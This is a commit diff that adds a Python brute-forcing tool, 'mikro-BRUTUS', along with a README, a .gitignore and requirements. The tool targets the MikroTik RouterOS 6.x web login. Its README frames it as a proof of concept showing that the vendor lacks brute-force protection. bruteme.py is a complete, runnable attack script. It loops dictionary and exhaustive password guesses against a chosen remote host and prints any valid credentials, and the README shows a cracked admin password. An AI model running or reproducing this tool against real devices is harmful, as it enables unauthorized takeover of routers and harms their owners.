Finishing Feature

.gitignore

@@ -0,0 +1,162 @@
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+.eggs/
+lib/
+lib64/
+parts/
+sdist/
+var/
+wheels/
+share/python-wheels/
+*.egg-info/
+.installed.cfg
+*.egg
+MANIFEST
+
+# PyInstaller
+#  Usually these files are written by a python script from a template
+#  before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.nox/
+.coverage
+.coverage.*
+.cache
+nosetests.xml
+coverage.xml
+*.cover
+*.py,cover
+.hypothesis/
+.pytest_cache/
+cover/
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+local_settings.py
+db.sqlite3
+db.sqlite3-journal
+
+# Flask stuff:
+instance/
+.webassets-cache
+
+# Scrapy stuff:
+.scrapy
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+.pybuilder/
+target/
+
+# Jupyter Notebook
+.ipynb_checkpoints
+
+# IPython
+profile_default/
+ipython_config.py
+
+# pyenv
+#   For a library or package, you might want to ignore these files since the code is
+#   intended to run in multiple environments; otherwise, check them in:
+# .python-version
+
+# pipenv
+#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
+#   However, in case of collaboration, if having platform-specific dependencies or dependencies
+#   having no cross-platform support, pipenv may install dependencies that don't work, or not
+#   install all needed dependencies.
+#Pipfile.lock
+
+# poetry
+#   Similar to Pipfile.lock, it is generally recommended to include poetry.lock in version control.
+#   This is especially recommended for binary packages to ensure reproducibility, and is more
+#   commonly ignored for libraries.
+#   https://python-poetry.org/docs/basic-usage/#commit-your-poetrylock-file-to-version-control
+#poetry.lock
+
+# pdm
+#   Similar to Pipfile.lock, it is generally recommended to include pdm.lock in version control.
+#pdm.lock
+#   pdm stores project-wide configurations in .pdm.toml, but it is recommended to not include it
+#   in version control.
+#   https://pdm.fming.dev/#use-with-ide
+.pdm.toml
+
+# PEP 582; used by e.g. github.com/David-OConnor/pyflow and github.com/pdm-project/pdm
+__pypackages__/
+
+# Celery stuff
+celerybeat-schedule
+celerybeat.pid
+
+# SageMath parsed files
+*.sage.py
+
+# Environments
+.env
+.venv
+env/
+venv/
+ENV/
+env.bak/
+venv.bak/
+
+# Spyder project settings
+.spyderproject
+.spyproject
+
+# Rope project settings
+.ropeproject
+
+# mkdocs documentation
+/site
+
+# mypy
+.mypy_cache/
+.dmypy.json
+dmypy.json
+
+# Pyre type checker
+.pyre/
+
+# pytype static type analyzer
+.pytype/
+
+# Cython debug symbols
+cython_debug/
+
+# PyCharm
+#  JetBrains specific template is maintained in a separate JetBrains.gitignore that can
+#  be found at https://github.com/github/gitignore/blob/main/Global/JetBrains.gitignore
+#  and can be added to the global gitignore or merged into this file.  For a more nuclear
+#  option (not recommended) you can uncomment the following to ignore the entire idea folder.
+#.idea/
+
+dictionary.txt

README.md

@@ -1,2 +1,27 @@
-# mikro-brutus
+# _mikro_-BRUTUS
+
 PoC (Proof of Concept) Bruteforcing Utility RouterOS v6.48.6
+
+_Mikro-BRUTUS_ is a simple proof of concept dictionary and blind brute forcing tool targeting the MikroTik RouterOS 6.x web interface. RouterOS notiously lacks brute force protections on the web and winbox interfaces. They've largely coasted off their custom authentication/encryption schemes from preventing these attacks.
+
+Luckily [Margin Research](https://margin.re/2022/06/pulling-mikrotik-into-the-limelight/) released a python library that can handle authentication from 6.34 - 6.49.8 (current release).
+
+This was written in about 10 minutes, and only to prove that MikroTik hasn't implemented any protections on the web interface.
+
+## Example Usage
+
+```sh
+git clone https://github.com/oyi77/mikro-brutus.git
+cd mikro-brutus
+python3 -m pip install -r requirements.txt
+python3 bruteme.py --rhost 10.9.49.1 --username admin
+Attempt 201
+Success! Valid credentials:
+admin:1qazxsw2
+```
+
+## Credit
+
+- Margin Research - webfig.py is their work (with one tweak). The original can be found [here](https://github.com/MarginResearch/FOISted/blob/master/webfig.py).
+
+- Bruteforce Dictionary - dictionary.txt is forked from the original leaked password dict. That can be found in the [here](http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2).

bruteme.py

@@ -0,0 +1,112 @@
+import sys
+import argparse
+import itertools
+import string
+import zipfile
+import os
+import contextlib
+from webfig import WebFig
+import colorama
+
+colorama.init(autoreset=True)
+
+def print_banner():
+    banner = f"{colorama.Fore.CYAN}====================================\n"\
+             f"           Mikro-Brutus Tool\n"\
+             f"===================================="
+    print(banner)
+
+def extract_dictionary(zip_file="dictionary.zip"):
+    zip_file_dir = os.path.dirname(zip_file)
+    with zipfile.ZipFile(zip_file, "r") as zip_ref:
+        zip_ref.extractall(zip_file_dir)
+
+def clear_line():
+    sys.stdout.write("\033[K")  # Clear the content of the line
+
+def dictionary_attack(args):
+    with open(args.dictionary) as passwords:
+        for attempt, password in enumerate(passwords, start=1):
+            password = password.strip()
+            clear_line()
+            print(
+                f"\r{colorama.Fore.YELLOW}Attempt {attempt} - Trying username: {args.username}, password: {password}",
+                end="",
+            )
+            with contextlib.suppress(ValueError):
+                w = WebFig(args.rhost, args.rport, args.username, password)
+                if w.is_valid_credential():
+                    print(f"{colorama.Fore.GREEN}\nSuccess! Valid credentials:\n{args.username}:{password}")
+                    return True
+    return False
+
+def blind_attack(args, max_password_length=4):
+    for password_length in range(1, max_password_length + 1):
+        for attempt, password in enumerate(
+            itertools.product(string.ascii_lowercase, repeat=password_length), start=1
+        ):
+            password = "".join(password)
+            clear_line()
+            print(
+                f"\r{colorama.Fore.YELLOW}Attempt {attempt} - Trying username: {args.username}, password: {password}",
+                end="",
+            )
+            with contextlib.suppress(ValueError):
+                w = WebFig(args.rhost, args.rport, args.username, password)
+                if w.is_valid_credential():
+                    print(f"{colorama.Fore.GREEN}\nSuccess! Valid credentials:\n{args.username}:{password}")
+                    return True
+    return False
+
+
+def main():
+    print_banner()
+    parser = argparse.ArgumentParser(
+        description="Perform a brute force attack using either dictionary or blind method."
+    )
+    parser.add_argument(
+        "--rhost", required=True, help="The remote address to brute force."
+    )
+    parser.add_argument(
+        "--rport",
+        default=80,
+        type=int,
+        help="The remote port to brute force (default: 80).",
+    )
+    parser.add_argument(
+        "--username", required=True, help="The username to authenticate with."
+    )
+    parser.add_argument(
+        "--dictionary",
+        default="rock",
+        help="The dictionary file for dictionary attack or 'rock' for default.",
+    )
+    parser.add_argument(
+        "--method",
+        choices=["dictionary", "blind"],
+        default="dictionary",
+        help="The attack method: 'dictionary' or 'blind' (default: 'dictionary').",
+    )
+    args = parser.parse_args()
+
+    success = False
+    try:
+        if args.method == "dictionary":
+            if args.dictionary == "rock":
+                extract_dictionary()
+                args.dictionary = "dictionary.txt"
+            success = dictionary_attack(args)
+        elif args.method == "blind":
+            success = blind_attack(args)
+    except KeyboardInterrupt:
+        print(f"{colorama.Fore.RED}\nOperation canceled by the user.")
+    except Exception as e:
+        print(f"{colorama.Fore.RED}An error occurred: {e}")
+
+    if not success:
+        print(f"{colorama.Fore.RED}\nAttack completed. No successful credentials found.")
+
+
+
+if __name__ == "__main__":
+    main()

requirements.txt

@@ -0,0 +1,4 @@
+pycryptodomex
+donna25519
+pynacl
+colorama